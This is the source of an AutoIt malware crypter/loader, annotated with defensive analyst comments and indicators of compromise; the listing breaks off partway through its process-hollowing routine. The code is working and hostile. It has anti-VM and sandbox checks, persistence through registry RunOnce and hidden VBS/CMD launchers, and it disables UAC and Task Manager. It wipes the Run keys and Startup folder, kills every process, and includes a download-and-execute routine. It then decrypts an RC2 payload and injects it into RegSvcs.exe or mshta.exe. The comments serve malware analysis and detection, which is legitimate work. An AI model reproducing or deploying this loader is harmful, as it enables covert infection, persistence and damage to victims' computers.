- ; ANALYST NOTE (defensive annotation only; the code itself is left unchanged): this is the stub
- ; of an AutoIt "crypter"/loader. It reads a config INI (65901.PPZ) that sits beside the script,
- ; runs whichever "options" the builder enabled, and SubMain() (further down) then decrypts an
- ; embedded payload file and runs it inside another process with _RunPE(). Every file name,
- ; directory and registry value below is a host-based indicator for this family.
- ; Requests elevation (UAC prompt) before the script body runs.
- #RequireAdmin
- ;hwid=F65F986EE6D635C25CB12C59AD6B4A7587500B110x75736572
- ; (the hwid line above is presumably a builder/licence tag; nothing in this listing reads it)
- #NoTrayIcon
- ; Crude AV-aware stalling: if the Avast UI is running, wait 20 s before doing anything.
- If ProcessExists("avastui.exe") Then Sleep(20000)
- ; Name of the drop directory under %USERPROFILE% (IOC: %USERPROFILE%\asvep\).
- $path = "asvep"
- ; 8.3 short names are used for all paths, presumably to avoid Unicode path issues.
- $uniscriptdir = FileGetShortName(@ScriptDir)
- $uniscriptfullpath = FileGetShortName(@scriptfullpath)
- $unicode_userprofile = FileGetShortName(@UserProfileDir)
- $unicode_startup = FileGetShortName(@StartupDir)
- $unicode_temp = FileGetShortName(@TempDir)
- $unicode_windows = FileGetShortName(@WindowsDir)
- $unicode_system = FileGetShortName(@SystemDir)
- ; Hide the directory the script lives in (+System +Hidden +ReadOnly).
- FileSetAttrib($uniscriptdir, "+SHR")
- ; Location check: intended to call bsod() (kill every process, see below) when the script is
- ; not running from %USERPROFILE%\asvep\<scriptname>.
- ; NOTE(review): AutoIt has no backslash escapes, so "\\" is a literal two-backslash string. With
- ; flag 1 the split delimiter is that whole string, so a normal single-backslash path is not split
- ; at all ($STR[0] = 1) and the bsod() branch is never reached — confirm dynamically before
- ; relying on this in a sandbox run.
- $Dir = $uniscriptfullpath
- $STR = StringSplit($Dir, "\\", 1)
- $directory = False
- For $i = 1 To $STR[0]
- If $STR[$i] = $path And $Dir = $unicode_userprofile & "\\" & $path & "\\" & @ScriptName Then
- $directory = True
- ExitLoop
- EndIf
- Next
- If $STR[0] - 1 And $directory = False Then
- bsod()
- EndIf
- ;options----------------------------------------------------------------------------------------------
- ; Each option below follows the same pattern: read [section] key from 65901.PPZ and, when the
- ; value equals a fixed sentinel, call the matching function. Section/key/sentinel names are
- ; either descriptive or replaced by numeric tokens (startup, uac, decryption key). The empty
- ; Else branches are no-ops. Note that systemhide() and persistence() are defined later but are
- ; not called from anywhere in this listing.
- ;delay
- Local $delay = IniRead($uniscriptdir & "\65901.PPZ", "delay1", "delay2", "NotFound")
- If $delay = "delay3" Then
- delay()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;mutex
- Local $mutex = IniRead($uniscriptdir & "\65901.PPZ", "mutex1", "mutex2", "NotFound")
- If $mutex = "mutex3" Then
- mutex()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;startup  (section/key/sentinel obfuscated as numbers: 5378250 / 6296134 / 4064234)
- Local $startup = IniRead($uniscriptdir & "\65901.PPZ", "5378250", "6296134", "NotFound")
- If $startup = "4064234" Then
- startup()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;antis
- Local $antis = IniRead($uniscriptdir & "\65901.PPZ", "antis1", "antis2", "NotFound")
- If $antis = "antis3" Then
- antis()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;fake message
- Local $fake = IniRead($uniscriptdir & "\65901.PPZ", "fake1", "fake2", "NotFound")
- If $fake = "fake3" Then
- fakemessage()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;botkiller
- Local $botkiller = IniRead($uniscriptdir & "\65901.PPZ", "botkiller1", "botkiller2", "NotFound")
- If $botkiller = "botkiller3" Then
- botkiller()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;downloader
- Local $downloader = IniRead($uniscriptdir & "\65901.PPZ", "downloader1", "downloader2", "NotFound")
- If $downloader = "downloader3" Then
- downloader()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;disable uac  (section/key/sentinel obfuscated as numbers: 6404000 / 6662859 / 9455413)
- Local $uac = IniRead($uniscriptdir & "\65901.PPZ", "6404000", "6662859", "NotFound")
- If $uac = "9455413" Then
- disable_uac()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;Disable System Restore
- Local $systemrestore = IniRead($uniscriptdir & "\65901.PPZ", "systemrestore1", "systemrestore2", "NotFound")
- If $systemrestore = "systemrestore3" Then
- disable_syste_restore()
- Else
- EndIf
- ;-----------------------------------------------------------------------------------------------------
- ;antitask
- Local $antitask = IniRead($uniscriptdir & "\65901.PPZ", "antitask1", "antitask2", "NotFound")
- If $antitask = "antitask3" Then
- antitask()
- Else
- EndIf
- ;Functions--------------------------------------------------------------------------------------------------------------------------
- ;delay
- ; Stalls roughly 30 s (6 passes x 5 s) before the rest of the script runs — a sandbox-timeout
- ; tactic. Each pass also launches an argument-less mshta.exe and then kills it through
- ; cmd /C taskkill (_RunDos).
- ; Detection: an AutoIt-compiled parent repeatedly spawning mshta.exe with no command line,
- ; each followed by cmd.exe /C taskkill /IM mshta.exe.
- Func delay()
- $counter = 0
- While $counter <= 5
- Sleep(5000)
- ShellExecute(@SystemDir & "\mshta.exe")
- $counter = $counter + 1
- _RunDos("taskkill /IM mshta.exe")
- WEnd
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;System Hide
- ; Explorer policy tampering so the dropped (+SH) files stay invisible to the user:
- ; removes the "Folder Options" menu and turns off display of protected hidden files.
- ; "HKCU64" selects the 64-bit registry view. Not called from anywhere in this listing.
- Func systemhide()
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1) ; don't show folder options
- Regwrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0) ; don't show hidden files
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;fake message
- ; Shows a decoy MsgBox (type/title/text come from the INI) exactly once per victim; the run is
- ; recorded by creating an empty marker file %USERPROFILE%\asvep\check.txt (IOC).
- Func fakemessage()
- $type = IniRead($uniscriptdir & "\65901.PPZ", "messagetype1", "messagetype2","NotFound")
- $title = IniRead($uniscriptdir & "\65901.PPZ", "messagetitle1", "messagetitle2","NotFound")
- $message = IniRead($uniscriptdir & "\65901.PPZ", "messagetext1", "messagetext2","NotFound")
- If FileExists($unicode_userprofile & "\\" & $path & "\check.txt") Then
- ;do nothing
- Else
- MsgBox($type,$title,$message)
- FileWrite($unicode_userprofile & "\\" & $path & "\check.txt", "")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;mutex
- ; Not a kernel mutex: single-instance check by process name. ProcessList() returns an array with
- ; the count in row 0, so UBound() > 2 means at least two "winupdate.exe" processes exist and this
- ; copy exits. "winupdate.exe" is the name the AutoIt interpreter is dropped under (see startup()).
- Func mutex()
- $scriptname = "winupdate.exe"
- If UBound(ProcessList($scriptname)) > 2 Then Exit
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;anti task manager
- ; Sets the per-user policy DisableTaskMgr = 1 (blocks Task Manager) if it is not already set.
- ; IOC: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr.
- func antitask()
- $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr")
- if Not ($read_antitask = "1") Then
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;disable uac
- ; Sets EnableLUA = 0 under HKLM (turns UAC off machine-wide). Needs the elevation obtained via
- ; #RequireAdmin; the change is generally only effective after the next logon/reboot.
- ; IOC: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = 0.
- func disable_uac()
- $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" , "EnableLUA")
- if Not ($read_uac = "0") Then
- RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" , "EnableLUA" , "REG_DWORD" , "0")
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;startup
- ; Persistence. Artefacts created (all IOCs):
- ;   %USERPROFILE%\asvep\start.cmd   - "cd" into the drop dir, then "start winupdate.exe <script>"
- ;                                     (the renamed AutoIt interpreter re-runs this script)
- ;   %USERPROFILE%\asvep\start.vbs   - runs start.cmd hidden via WScript.Shell
- ;   <Startup folder>\start.lnk      - shortcut to start.vbs, only when CheckElevationEnabled
- ;                                     reports non-zero; deleted again further down on the
- ;                                     first-run path
- ;   HKCU\...\CurrentVersion\RunOnce\asvep = path to start.vbs
- ; All dropped files are marked +S +H (+R).
- Func startup()
- $bUAC = _CheckElevationEnabled()
- If $bUAC = 0 Then
- ;do nothing
- Else
- FileCreateShortcut($unicode_userprofile & "\\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
- FileSetAttrib($unicode_startup & "\start.lnk","+SH")
- EndIf
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
- ; First run: write the .cmd / .vbs launcher pair if start.vbs is not there yet.
- If Not FileExists($unicode_userprofile & "\\" & $path & "\start.vbs") Then
- Local $bat = FileOpen($unicode_userprofile & "\\" & $path & "\start.cmd", 1)
- $autoit3 = "winupdate.exe"
- FileWrite($bat, "@echo off" & @CRLF & "cd " & "%userprofile%\" & $path & "\\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"')
- FileClose($bat)
- Local $vbs = FileOpen($unicode_userprofile & "\\" & $path & "\start.vbs", 1)
- FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & $unicode_userprofile & "\\" & $path & "\\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
- FileClose($vbs)
- RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
- FileSetAttrib($unicode_userprofile & "\\" & $path & "\start.vbs","+SHR")
- FileSetAttrib($unicode_userprofile & "\\" & $path & "\start.cmd","+SHR")
- ; On this path the Startup-folder shortcut created above is removed again, leaving RunOnce.
- if FileExists($unicode_startup & "\start.lnk") Then
- FileDelete($unicode_startup & "\start.lnk")
- EndIf
- Else
- EndIf
- EndFunc
- ;Checks if Use Access Control (UAC) is Enabled.
- ;Checks if Use Access Control (UAC) is Enabled.
- ; Wraps kernel32!CheckElevationEnabled (an undocumented export) which writes a BOOL into the
- ; supplied buffer. The API's DWORD result is surfaced through @error; the BOOL is the return value.
- Func _CheckElevationEnabled()
- Local $struct = DllStructCreate("BOOL")
- Local $aRtn = DllCall("kernel32.dll","DWORD","CheckElevationEnabled","ptr", DllStructGetPtr($struct))
- If @error Then
- Return SetError(@error)
- EndIf
- Return SetError($aRtn[0],0,DllStructGetData($struct,1))
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;Antis
- ;Antis
- ; Environment checks; any hit terminates the script silently.
- ;  - "sandbox": exits when WinGetText("Program Manager") yields "0" (i.e. no usable desktop
- ;    shell window — presumably aimed at headless analysis boxes; verify what the call returns
- ;    on the target OS).
- ;  - VM: exits if the VirtualBox guest service or the VMware tray process is running.
- ; Defeating these in a lab: keep a normal interactive desktop and rename/stop the two processes.
- func antis()
- ;anti sandbox
- If WinGetText("Program Manager") = "0" Then
- Exit
- Else
- EndIf
- ;anti vm's
- if ProcessExists("VboxService.exe") Then
- Exit
- EndIf
- if ProcessExists("VMwaretray.exe") Then
- Exit
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;Persistence
- ;Persistence
- ; Watchdog-style restart: if no RegSvcs.exe (the preferred _RunPE host) is running, launch a
- ; 7246235.vbe script from the script directory and exit. That .vbe is not part of this listing.
- ; Not called from anywhere in this listing. IOC: <scriptdir>\7246235.vbe.
- func persistence()
- if processexists("RegSvcs.exe") then
- ;do nothing
- else
- $pathtovbs = ($uniscriptdir & "\\" & "7246235.vbe")
- ShellExecute($pathtovbs)
- exit
- endif
- endfunc
- ;------------------------------------------------------------------------------------------------------
- ;Downloader
- ;Downloader
- ; One-shot secondary download, gated by the marker file %USERPROFILE%\asvep\dl.txt (IOC).
- ; Fetches the URL (still the builder placeholder "replace-me-url" in this sample, so this option
- ; is unconfigured here) into %TEMP%\<5 random digits>.exe in the background (InetGet flags
- ; 1 = force reload, 1 = background), waits for completion, then executes it.
- Func downloader()
- if FileExists($unicode_userprofile & "\\" & $path & "\dl.txt") Then
- ;do nothing
- Else
- FileWrite($unicode_userprofile & "\\" & $path & "\dl.txt","")
- ; Advanced example - downloading in the background
- $random_download_name = Random(10000, 99999, 1) & ".exe"
- Local $hDownload = InetGet("replace-me-url", $unicode_temp & "\\" & $random_download_name, 1, 1)
- Do
- Sleep(250)
- Until InetGetInfo($hDownload, 2) ; Check if the download is complete.
- Local $nBytes = InetGetInfo($hDownload, 0)
- InetClose($hDownload) ; Close the handle to release resources.
- ShellExecute($unicode_temp & "\\" & $random_download_name)
- EndIf
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;BSOD
- ;BSOD
- ; Not a real bugcheck call: enumerates every process and calls ProcessClose on each. Because
- ; the script runs elevated (#RequireAdmin), killing critical system processes this way can
- ; bring the machine down, hence the name. Called from the location check at the top of the script.
- Func bsod()
- $a = ProcessList()
- For $i = 1 To UBound($a) - 1
- ProcessClose($a[$i][0])
- Next
- Exit
- EndFunc
- ;-----------------------------------------------------------------------------------------------------
- ;botkiller
- ;botkiller
- ; "Bot killer": removes competing (and legitimate) autostarts. RegDelete with only a key name
- ; deletes the entire HKCU and HKLM ...\CurrentVersion\Run keys, RegWrite then recreates them
- ; empty, and every file in the user's Startup folder is deleted. Collateral for the victim:
- ; all Run-key autostarts are lost. Wiped Run keys next to a RunOnce\asvep entry is a useful
- ; forensic signature.
- Func botkiller()
- ;delete
- RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- ;restore
- RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- ;Else
- ;delete
- RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- ;restore
- RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
- FileDelete(@StartupDir & "\*.*")
- EndFunc ;==>botkiller
- ; "Disable System Restore": deletes HKLM\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients
- ; (presumably to unregister System Restore / shadow-copy clients — confirm effect per OS version).
- ; Runs once, gated by a marker file check.txt in the script directory (note: a different
- ; check.txt than the one fakemessage() uses in the drop directory).
- func disable_syste_restore()
- if FileExists($uniscriptdir & "\check.txt") Then
- ;do nothing
- Else
- RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
- FileWrite($uniscriptdir & "\check.txt","")
- EndIf
- EndFunc
- ;data from crypt.au3 & process.au3:--------------------------------------------------------------------------------------------------------------------------
- ; Runs $sCommand through %COMSPEC% /C in a hidden window and waits for it; returns the exit
- ; code, with @error/@extended passed through. Used by delay() for taskkill.
- Func _RunDos($sCommand)
- Local $nResult = RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
- Return SetError(@error, @extended, $nResult)
- EndFunc ;==>_RunDos
- ; Windows CryptoAPI (advapi32) constants lifted from the AutoIt Crypt.au3 UDF: provider types,
- ; CryptAcquireContext / CryptGetHashParam flags, and ALG_ID values. $CALG_RC2 is the one
- ; SubMain() uses to decrypt the embedded payload; $CALG_MD5 is the key-derivation hash.
- Global Const $PROV_RSA_FULL = 0x1
- Global Const $PROV_RSA_AES = 24
- Global Const $CRYPT_VERIFYCONTEXT = 0xF0000000
- Global Const $HP_HASHSIZE = 0x0004
- Global Const $HP_HASHVAL = 0x0002
- Global Const $CRYPT_EXPORTABLE = 0x00000001
- Global Const $CRYPT_USERDATA = 1
- Global Const $CALG_MD2 = 0x00008001
- Global Const $CALG_MD4 = 0x00008002
- Global Const $CALG_MD5 = 0x00008003
- Global Const $CALG_SHA1 = 0x00008004
- Global Const $CALG_3DES = 0x00006603
- Global Const $CALG_AES_128 = 0x0000660e
- Global Const $CALG_AES_192 = 0x0000660f
- Global Const $CALG_AES_256 = 0x00006610
- Global Const $CALG_DES = 0x00006601
- Global Const $CALG_RC2 = 0x00006602
- Global Const $CALG_RC4 = 0x00006801
- Global Const $CALG_USERKEY = 0
- ; [0] = startup refcount, [1] = advapi32 DllOpen handle, [2] = CSP context handle.
- Global $__g_aCryptInternalData[3]
- ; CryptoAPI encrypt (from Crypt.au3, trimmed). Unless $iALG_ID is $CALG_USERKEY the key is
- ; derived from the password via _Crypt_DeriveKey (MD5 -> CryptDeriveKey). Two CryptEncrypt
- ; calls: the first (NULL buffer) sizes the output, the second encrypts in place. Returns the
- ; ciphertext as binary, or -1 on failure. Not called anywhere in this listing (the stub only
- ; decrypts); kept here because the builder side uses the matching operation.
- ; NOTE: this trimmed copy sets $iError but never passes it to SetError, and the derived key
- ; handle is not destroyed.
- Func _Crypt_EncryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True)
- Local $hBuff
- Local $iError
- Local $vReturn
- Local $ReqBuffSize
- Local $aRet
- _Crypt_Startup()
- Do
- If $iALG_ID <> $CALG_USERKEY Then
- $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID)
- If @error Then
- $iError = 1
- $vReturn = -1
- ExitLoop
- EndIf
- EndIf
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vData), "dword", 0)
- If @error Or Not $aRet[0] Then
- $iError = 2
- $vReturn = -1
- ExitLoop
- EndIf
- $ReqBuffSize = $aRet[6]
- $hBuff = DllStructCreate("byte[" & $ReqBuffSize & "]")
- DllStructSetData($hBuff, 1, $vData)
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptEncrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "struct*", $hBuff, "dword*", BinaryLen($vData), "dword", DllStructGetSize($hBuff))
- If @error Or Not $aRet[0] Then
- $iError = 3
- $vReturn = -1
- ExitLoop
- EndIf
- $iError = 0
- $vReturn = DllStructGetData($hBuff, 1)
- Until True
- Return $vReturn
- EndFunc ;==>_Crypt_EncryptData
- ; CryptoAPI decrypt (from Crypt.au3, trimmed). Key derivation as in _Crypt_EncryptData. The
- ; ciphertext is copied into a buffer 1000 bytes larger than itself, CryptDecrypt works in place,
- ; and the returned plaintext is the leading $aRet[6] bytes. Returns -1 on failure.
- ; For analysts: SubMain() calls this with $CALG_RC2 and the INI-supplied key, so the payload in
- ; 20070.RQT can be recovered offline with RC2 and a CryptDeriveKey(MD5(key)) key schedule.
- ; NOTE: as in the encrypt copy, $iError is computed but not surfaced via SetError, and the
- ; derived key handle is never destroyed.
- Func _Crypt_DecryptData($vData, $vCryptKey, $iALG_ID, $fFinal = True)
- Local $hBuff
- Local $iError
- Local $vReturn
- Local $hTempStruct
- Local $iPlainTextSize
- Local $aRet
- _Crypt_Startup()
- Do
- If $iALG_ID <> $CALG_USERKEY Then
- $vCryptKey = _Crypt_DeriveKey($vCryptKey, $iALG_ID)
- If @error Then
- $iError = 1
- $vReturn = -1
- ExitLoop
- EndIf
- EndIf
- $hBuff = DllStructCreate("byte[" & BinaryLen($vData) + 1000 & "]")
- DllStructSetData($hBuff, 1, $vData)
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDecrypt", "handle", $vCryptKey, "handle", 0, "bool", $fFinal, "dword", 0, "struct*", $hBuff, "dword*", BinaryLen($vData))
- If @error Or Not $aRet[0] Then
- $iError = 2
- $vReturn = -1
- ExitLoop
- EndIf
- $iPlainTextSize = $aRet[6]
- $hTempStruct = DllStructCreate("byte[" & $iPlainTextSize & "]", DllStructGetPtr($hBuff))
- $iError = 0
- $vReturn = DllStructGetData($hTempStruct, 1)
- Until True
- Return $vReturn
- EndFunc ;==>_Crypt_DecryptData
- ; Reference-counted CryptoAPI initialisation. On the first call it opens advapi32.dll and
- ; acquires a PROV_RSA_AES context (PROV_RSA_FULL on Windows 2000) with CRYPT_VERIFYCONTEXT,
- ; i.e. an ephemeral context that needs no persistent key container. Returns True on success;
- ; @error 1 = DllOpen failed, 2 = CryptAcquireContext failed.
- Func _Crypt_Startup()
- If __Crypt_RefCount() = 0 Then
- Local $hAdvapi32 = DllOpen("Advapi32.dll")
- If @error Then Return SetError(1, 0, False)
- __Crypt_DllHandleSet($hAdvapi32)
- Local $aRet
- Local $iProviderID = $PROV_RSA_AES
- If @OSVersion = "WIN_2000" Then $iProviderID = $PROV_RSA_FULL ; Provide backwards compatibility with win2000
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iProviderID, "dword", $CRYPT_VERIFYCONTEXT)
- If @error Or Not $aRet[0] Then
- DllClose(__Crypt_DllHandle())
- Return SetError(2, 0, False)
- Else
- __Crypt_ContextSet($aRet[1])
- ; Fall through to success.
- EndIf
- EndIf
- __Crypt_RefCountInc()
- Return True
- EndFunc ;==>_Crypt_Startup
- ; Password -> session key: hashes $vPassword with $iHash_ALG_ID (MD5 by default) and feeds the
- ; hash object to CryptDeriveKey for algorithm $iALG_ID (CRYPT_EXPORTABLE). Returns the key
- ; handle, or -1 with @error 1..3 (CreateHash / HashData / DeriveKey). The hash object is
- ; destroyed before returning; the caller owns the key handle.
- Func _Crypt_DeriveKey($vPassword, $iALG_ID, $iHash_ALG_ID = $CALG_MD5)
- Local $aRet
- Local $hCryptHash
- Local $hBuff
- Local $iError
- Local $vReturn
- _Crypt_Startup()
- Do
- ; Create Hash object
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptCreateHash", "handle", __Crypt_Context(), "uint", $iHash_ALG_ID, "ptr", 0, "dword", 0, "handle*", 0)
- If @error Or Not $aRet[0] Then
- $iError = 1
- $vReturn = -1
- ExitLoop
- EndIf
- $hCryptHash = $aRet[5]
- $hBuff = DllStructCreate("byte[" & BinaryLen($vPassword) & "]")
- DllStructSetData($hBuff, 1, $vPassword)
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptHashData", "handle", $hCryptHash, "struct*", $hBuff, "dword", DllStructGetSize($hBuff), "dword", $CRYPT_USERDATA)
- If @error Or Not $aRet[0] Then
- $iError = 2
- $vReturn = -1
- ExitLoop
- EndIf
- ; Create key
- $aRet = DllCall(__Crypt_DllHandle(), "bool", "CryptDeriveKey", "handle", __Crypt_Context(), "uint", $iALG_ID, "handle", $hCryptHash, "dword", $CRYPT_EXPORTABLE, "handle*", 0)
- If @error Or Not $aRet[0] Then
- $iError = 3
- $vReturn = -1
- ExitLoop
- EndIf
- $iError = 0
- $vReturn = $aRet[5]
- Until True
- If $hCryptHash <> 0 Then DllCall(__Crypt_DllHandle(), "bool", "CryptDestroyHash", "handle", $hCryptHash)
- Return SetError($iError, 0, $vReturn)
- EndFunc ;==>_Crypt_DeriveKey
- ; Stores the CSP context handle (slot 2 of the internal state array).
- Func __Crypt_ContextSet($hCryptContext)
- $__g_aCryptInternalData[2] = $hCryptContext
- EndFunc ;==>__Crypt_ContextSet
- ; Returns the CSP context handle set by __Crypt_ContextSet.
- Func __Crypt_Context()
- Return $__g_aCryptInternalData[2]
- EndFunc ;==>__Crypt_Context
- ; Stores the DllOpen handle for advapi32.dll (slot 1 of the internal state array).
- Func __Crypt_DllHandleSet($hAdvapi32)
- $__g_aCryptInternalData[1] = $hAdvapi32
- EndFunc ;==>__Crypt_DllHandleSet
- ; Returns the advapi32.dll handle used for every DllCall in the Crypt functions.
- Func __Crypt_DllHandle()
- Return $__g_aCryptInternalData[1]
- EndFunc ;==>__Crypt_DllHandle
- ; Decrements the startup reference count, never below zero. Not called in this listing
- ; (there is no matching _Crypt_Shutdown), so the CSP context is never released.
- Func __Crypt_RefCountDec()
- If $__g_aCryptInternalData[0] > 0 Then $__g_aCryptInternalData[0] -= 1
- EndFunc ;==>__Crypt_RefCountDec
- ; Increments the startup reference count (slot 0 of the internal state array).
- Func __Crypt_RefCountInc()
- $__g_aCryptInternalData[0] += 1
- EndFunc ;==>__Crypt_RefCountInc
- ; Returns the current startup reference count; 0 means _Crypt_Startup has not initialised yet.
- Func __Crypt_RefCount()
- Return $__g_aCryptInternalData[0]
- EndFunc ;==>__Crypt_RefCount
- ;end of data from crypt.au3
- ; Entry into the payload stage — runs after all the options above have been processed.
- SubMain()
- ; Payload stage. Reads the decryption key from 65901.PPZ ([1109091] 1109091=...), loads the
- ; encrypted payload file 20070.RQT from the script directory as raw binary (FileOpen mode 16),
- ; decrypts it with RC2 (key derived by _Crypt_DeriveKey from the INI value), and hands the
- ; resulting PE image to _RunPE for in-memory execution. Nothing is written to disk in clear.
- ; IOCs: 65901.PPZ and 20070.RQT next to the loader; the three files together are enough to
- ; reproduce the decryption for analysis.
- Func SubMain()
- $sKey = IniRead($uniscriptdir & "\65901.PPZ", "1109091", "1109091", "NotFound")
- $sAppPath1 = FileGetShortName(@ScriptDir & "\20070.RQT")
- $sAppPath = FileRead(FileOpen($sAppPath1,16))
- $sArquive = _Crypt_DecryptData($sAppPath, $sKey, $CALG_RC2)
- _RunPE($sArquive)
- EndFunc
- ; this is the func that get the settings of the Binded file to be decrypted
- ; Returns everything in $GetFileData that follows the first occurrence of $StringToGet (a
- ; simple "value after marker" extractor). Not called anywhere in this listing — presumably a
- ; leftover from a variant that embeds settings in the bound file instead of the INI.
- Func Info($GetFileData, $StringToGet)
- Return StringTrimLeft($GetFileData, StringInStr($GetFileData, $StringToGet) - 1 + StringLen($StringToGet))
- EndFunc
- ;RUNPE
- ; Process hollowing ("RunPE"). $bbinaryimage is the decrypted PE; a host process is created
- ; suspended, the payload image is mapped into it, the host's PEB and main-thread context are
- ; patched to point at the payload, and the thread is resumed. Host preference: .NET
- ; RegSvcs.exe (v4.0.30319, then v2.0.50727), falling back to mshta.exe.
- ; Helpers __runpe_iswow64process, __runpe_allocateexespace, __runpe_allocateexespaceataddress
- ; and __runpe_unmapviewofsection are defined outside this listing.
- ; Returns the host PID, or 0 with @error set (1..11, 101, 102) after terminating the host.
- ; Detection/forensics: CreateProcessW with dwCreationFlags = 4 (CREATE_SUSPENDED) of
- ; RegSvcs.exe/mshta.exe by an AutoIt-compiled parent (e.g. winupdate.exe), followed by
- ; WriteProcessMemory, SetThreadContext and ResumeThread on that child; in memory the child's
- ; PEB ImageBaseAddress and mapped image no longer match its on-disk file.
- Func _RunPE($bbinaryimage, $scommandline = "")
- #region 1. DETERMINE INTERPRETER TYPE
- Local $fautoitx64 = @AutoItX64
- #region 2. PREDPROCESSING PASSED
- ; Copy the payload into a DllStruct so PE headers can be overlaid on it by pointer.
- Local $bbinary = Binary($bbinaryimage)
- Local $tbinary = DllStructCreate("BYTE[" & BinaryLen($bbinary) & "]")
- DllStructSetData($tbinary, 1, $bbinary)
- Local $ppointer = DllStructGetPtr($tbinary)
- #region 3. CREATING NEW PROCESS
- Local $tstartupinfo = DllStructCreate("DWORD CBSIZE;" & "PTR RESERVED;" & "PTR DESKTOP;" & "PTR TITLE;" & "DWORD X;" & "DWORD Y;" & "DWORD XSIZE;" & "DWORD YSIZE;" & "DWORD XCOUNTCHARS;" & "DWORD YCOUNTCHARS;" & "DWORD FILLATTRIBUTE;" & "DWORD FLAGS;" & "WORD SHOWWINDOW;" & "WORD RESERVED2;" & "PTR RESERVED2;" & "PTR HSTDINPUT;" & "PTR HSTDOUTPUT;" & "PTR HSTDERROR")
- Local $tprocess_information = DllStructCreate("PTR PROCESS;" & "PTR THREAD;" & "DWORD PROCESSID;" & "DWORD THREADID")
- ; Candidate host binaries (all Microsoft-signed, so the payload runs under a trusted image name).
- $Injecto2 = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe")
- $Injecto4 = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe")
- $Inject_other = ($unicode_system & "\mshta.exe")
- ; dwCreationFlags = 4 -> CREATE_SUSPENDED: the host never executes its own code.
- If FileExists($Injecto4) Then
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Injecto4, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
- Elseif FileExists($Injecto2) then
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Injecto2, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
- Else
- Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $Inject_other, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information))
- EndIf
- If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
